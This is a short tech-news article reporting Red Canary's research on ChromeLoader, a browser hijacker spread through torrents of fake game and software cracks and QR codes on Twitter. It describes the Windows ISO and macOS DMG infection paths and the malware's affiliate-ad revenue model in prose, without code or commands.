The distribution of ChromeLoader malware (opens in a new tab) has increased in recent months, turning it from a relative nuisance into a threat in its own right.
Red Canary researchers have been tracking the malware for the past five months and say the threat has increased significantly.
According to the research, the attackers target both Windows and macOS users, distributing the malware via torrent files posing as software and game cracks.
They also use social networking sites, such as Twitter, to promote torrent links, sharing QR codes that lead to sites that host malware.
ChromeLoader malware
The goal is for victims to download the files themselves. For Windows purposes, the files come in an .ISO file which, when mounted with a virtual CD-ROM drive, displays an executive file disguised as a crack or keygen. The researchers say that its most likely file name is "CS_Installer.exe".
Once the victim executes the file, it executes and decodes a PowerShell command that extracts a file from the server and loads it as a Google Chrome browser extension (opens in a new tab). After that, PowerShell kills the scheduled task, leaving no trace of its presence.
The methodology for macOS is somewhat different; instead of an ISO, the attackers use DMG files, which are more common on the platform. It also replaces the installer executable with an installer bash script that downloads and unpacks the extension to "private/var/tmp".
ChromeLoader is described as a browser hijacker that can modify browser settings on the target endpoint (opens in a new tab), allowing it to display modified search results. By displaying fake giveaways, dating sites, or unwanted third-party software, threat actors earn commissions on affiliate programs.
What sets ChromeLoader apart in a sea of similar browser hijackers is its persistence, volume, and infection path, the researchers said.